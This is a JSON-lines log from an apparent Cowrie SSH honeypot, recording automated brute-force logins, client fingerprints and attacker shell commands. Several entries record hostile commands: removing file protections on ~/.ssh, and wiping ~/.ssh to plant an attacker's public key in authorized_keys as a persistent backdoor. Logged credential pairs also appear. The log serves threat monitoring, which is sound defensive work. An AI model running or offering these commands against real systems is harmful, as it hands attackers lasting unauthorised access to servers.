{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:16:39.499037Z","src_ip":"212.227.125.160","session":"6d9c8d48a0cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55710,"dst_ip":"1.2.3.4","dst_port":22,"session":"03586bbded97","protocol":"ssh","message":"New connection: 212.227.125.160:55710 (1.2.3.4:22) [session: 03586bbded97]","sensor":"my-vps","timestamp":"2025-08-31T05:16:44.655398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:16:45.098908Z","src_ip":"212.227.125.160","session":"03586bbded97"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:16:45.099914Z","src_ip":"212.227.125.160","session":"03586bbded97"}
{"eventid":"cowrie.login.success","username":"root","password":"zello2021","message":"login attempt [root/zello2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:16:45.500364Z","src_ip":"212.227.125.160","session":"6d9c8d48a0cc"}
{"eventid":"cowrie.session.closed","duration":120.00117254257202,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:46.949513Z","src_ip":"115.135.72.15","session":"46008533bdd9"}
{"eventid":"cowrie.login.failed","username":"server","password":"abc123","message":"login attempt [server/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:16:47.193456Z","src_ip":"212.227.125.160","session":"03586bbded97"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:48.739418Z","src_ip":"212.227.125.160","session":"03586bbded97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:16:52.420606Z","src_ip":"212.227.125.160","session":"6d9c8d48a0cc"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-31T05:16:52.421309Z","src_ip":"212.227.125.160","session":"6d9c8d48a0cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:53.988467Z","src_ip":"212.227.125.160","session":"6d9c8d48a0cc"}
{"eventid":"cowrie.session.closed","duration":"15.2","message":"Connection lost after 15.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:53.989649Z","src_ip":"212.227.125.160","session":"6d9c8d48a0cc"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":53082,"dst_ip":"1.2.3.4","dst_port":22,"session":"e70c022fa3d8","protocol":"ssh","message":"New connection: 201.148.180.50:53082 (1.2.3.4:22) [session: e70c022fa3d8]","sensor":"my-vps","timestamp":"2025-08-31T05:16:57.151534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:16:58.204837Z","src_ip":"201.148.180.50","session":"e70c022fa3d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:16:58.205504Z","src_ip":"201.148.180.50","session":"e70c022fa3d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50436,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba08db7c7dd9","protocol":"ssh","message":"New connection: 212.227.235.229:50436 (1.2.3.4:22) [session: ba08db7c7dd9]","sensor":"my-vps","timestamp":"2025-08-31T05:17:01.950028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:17:01.951411Z","src_ip":"212.227.235.229","session":"ba08db7c7dd9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:17:02.229395Z","src_ip":"212.227.235.229","session":"ba08db7c7dd9"}
{"eventid":"cowrie.login.success","username":"root","password":"zello2021","message":"login attempt [root/zello2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:17:03.365493Z","src_ip":"201.148.180.50","session":"e70c022fa3d8"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"pass","message":"login attempt [vpn/pass] failed","sensor":"my-vps","timestamp":"2025-08-31T05:17:03.376428Z","src_ip":"212.227.235.229","session":"ba08db7c7dd9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:04.656968Z","src_ip":"212.227.235.229","session":"ba08db7c7dd9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:17:06.353784Z","src_ip":"201.148.180.50","session":"e70c022fa3d8"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T05:17:06.354565Z","src_ip":"201.148.180.50","session":"e70c022fa3d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52176,"dst_ip":"1.2.3.4","dst_port":22,"session":"15c1a5ab3d66","protocol":"ssh","message":"New connection: 212.227.125.160:52176 (1.2.3.4:22) [session: 15c1a5ab3d66]","sensor":"my-vps","timestamp":"2025-08-31T05:17:06.555754Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:07.669584Z","src_ip":"201.148.180.50","session":"e70c022fa3d8"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:07.670765Z","src_ip":"201.148.180.50","session":"e70c022fa3d8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:17:12.999469Z","src_ip":"212.227.125.160","session":"15c1a5ab3d66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:17:13.001753Z","src_ip":"212.227.125.160","session":"15c1a5ab3d66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54554,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c3971fb4782","protocol":"ssh","message":"New connection: 212.227.235.229:54554 (1.2.3.4:22) [session: 2c3971fb4782]","sensor":"my-vps","timestamp":"2025-08-31T05:17:17.305766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:17:17.307022Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:17:17.387964Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.login.success","username":"root","password":"Y4k1nm4suk.2019","message":"login attempt [root/Y4k1nm4suk.2019] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:17:17.714335Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:17:17.893524Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:17:17.894243Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:17:17.895417Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:17.978593Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:17:18.646988Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:17:18.647750Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:17:18.731999Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:18.732909Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54568,"dst_ip":"1.2.3.4","dst_port":22,"session":"455e3d17259e","protocol":"ssh","message":"New connection: 212.227.235.229:54568 (1.2.3.4:22) [session: 455e3d17259e]","sensor":"my-vps","timestamp":"2025-08-31T05:17:18.833323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:17:18.834202Z","src_ip":"212.227.235.229","session":"455e3d17259e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:17:18.926016Z","src_ip":"212.227.235.229","session":"455e3d17259e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:17:19.330917Z","src_ip":"212.227.235.229","session":"455e3d17259e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:20.425235Z","src_ip":"212.227.235.229","session":"455e3d17259e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54582,"dst_ip":"1.2.3.4","dst_port":22,"session":"cddfa3edd785","protocol":"ssh","message":"New connection: 212.227.235.229:54582 (1.2.3.4:22) [session: cddfa3edd785]","sensor":"my-vps","timestamp":"2025-08-31T05:17:20.497732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:17:20.498591Z","src_ip":"212.227.235.229","session":"cddfa3edd785"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:17:20.580737Z","src_ip":"212.227.235.229","session":"cddfa3edd785"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:17:20.953472Z","src_ip":"212.227.235.229","session":"cddfa3edd785"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:21.037006Z","src_ip":"212.227.235.229","session":"2c3971fb4782"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:17:21.037882Z","src_ip":"212.227.235.229","session":"cddfa3edd785"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44462,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a105fae2dae","protocol":"ssh","message":"New connection: 212.227.235.229:44462 (1.2.3.4:22) [session: 6a105fae2dae]","sensor":"my-vps","timestamp":"2025-08-31T05:17:22.183311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:17:23.311910Z","src_ip":"212.227.235.229","session":"6a105fae2dae"}
